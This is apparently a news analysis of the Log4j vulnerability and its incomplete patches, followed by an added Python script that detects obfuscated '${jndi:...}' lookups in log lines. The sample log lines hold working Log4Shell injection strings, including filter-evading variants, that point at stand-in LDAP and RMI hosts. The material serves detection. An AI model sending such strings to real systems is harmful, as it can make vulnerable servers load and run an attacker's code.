Software fix for ‘worst vulnerability in a decade’ introduces new flaws — Analysis
The patch released to fix a critical flaw in widely used software has itself handed attackers two new ways in.
The disclosure last week of a vulnerability in Log4j, an open-source logging library maintained by the Apache Software Foundation, made global headlines: any server that logged attacker-supplied text with a vulnerable version of the library could be made to run code of the attacker's choosing.
A patch released last week closed that hole, but, as ZDNet and Ars Technica have both reported, the patch turned out to have problems of its own.
According to the developers, the fix is “incomplete in certain non-default configurations”, leaving attackers able to mount denial-of-service attacks, which render a service unavailable. The developers say the risk can be reduced by disabling certain features of the library.
On Wednesday the cybersecurity company Praetorian reported a second problem: it said that even with the fix applied, the library “can still allow for exfiltration of sensitive data in certain circumstances.”
A newer version of the library was released this week; companies now have to roll that upgrade out across every product that embeds Log4j.
Attackers are actively exploiting the original zero-day. The Financial Times estimates that more than 1.2 million attacks using the Log4j flaw have been attempted since Friday.
The library is written in Java, a programming language found in a vast range of modern products, which is why the security firm Tenable has called the flaw the “single biggest, most critical vulnerability of the last decade”.
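The article describes the scale of the attacks but not what one looks like in a server log. As an added example (not code from this article, from Log4j or from any of the firms it cites), the following Python script scans constructed access-log lines for the `${jndi:...}` lookup string that triggers the flaw. Before matching, it folds the obfuscation tricks attackers used to slip past naive `${jndi:` filters (`${lower:...}`, `${upper:...}` and the `${...:-default}` fallback syntax), which is why a plain string search is not enough. The log lines, IP addresses and host names are constructed samples; the assumption is that the logged field (here the User-Agent) was handed to a vulnerable Log4j 2.x release.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log lines (not real traffic): an access log whose
# User-Agent field, which many applications pass straight to Log4j, carries
# a lookup string. Assumption: the application logged it with a vulnerable
# Log4j 2.x release, so the string would be evaluated rather than just stored.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:J}${upper:n}${lower:d}i:${lower:R}mi://203.0.113.9:1099/x}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:${::-l}${::-d}ap://example.test/q}"',
    '10.0.0.8 - - [10/Dec/2021:14:02:14 +0000] "GET /health HTTP/1.1" 200 2 "-" '
    '"Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 2 "-" '
    '"curl/7.79"',
]

# Matches a ${...} with no further ${ or } inside, i.e. an innermost lookup.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# The lookup name is case-insensitive in Log4j, so ${JnDi:...} fires too.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Statically fold one innermost lookup body.

    Only the forms attackers use to hide the word "jndi" are folded; the jndi
    lookup itself and anything unknown are left in place (None).
    """
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${name:-default}: an unknown or empty lookup evaluates to the
        # default, so ${::-j} and ${env:NOPE:-j} both become "j".
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Fold innermost lookups inside-out until nothing changes.

    The round cap guards against pathological input; a real payload needs
    only a handful of rounds to collapse to ${jndi:...}.
    """
    for _ in range(max_rounds):
        changed = False

        def fold(match: "re.Match[str]") -> str:
            nonlocal changed
            folded = _resolve(match.group(1))
            if folded is None:
                return match.group(0)
            changed = True
            return folded

        text = _INNERMOST.sub(fold, text)
        if not changed:
            break
    return text


@dataclass
class Finding:
    line_no: int
    scheme: str       # ldap, ldaps, rmi, dns, ...: where the victim would connect out to
    normalized: str   # the line after de-obfuscation, for the analyst


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return one Finding per line that contains a (possibly obfuscated) jndi lookup."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = _JNDI.search(normalized)
        if match:
            findings.append(Finding(line_no, match.group(1).lower(), normalized))
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: jndi lookup via {f.scheme}: {f.normalized}")
```

Run against the samples, the first three lines are flagged (two LDAP, one RMI) while the benign health check and the harmless `${date:yyyy}` lookup are not. The folding is deliberately static: lookups such as `${env:...}` or `${sys:...}` with no `:-` default only resolve on the victim, so a line that still contains `${` after normalization but did not match is worth a second look rather than a clean bill of health.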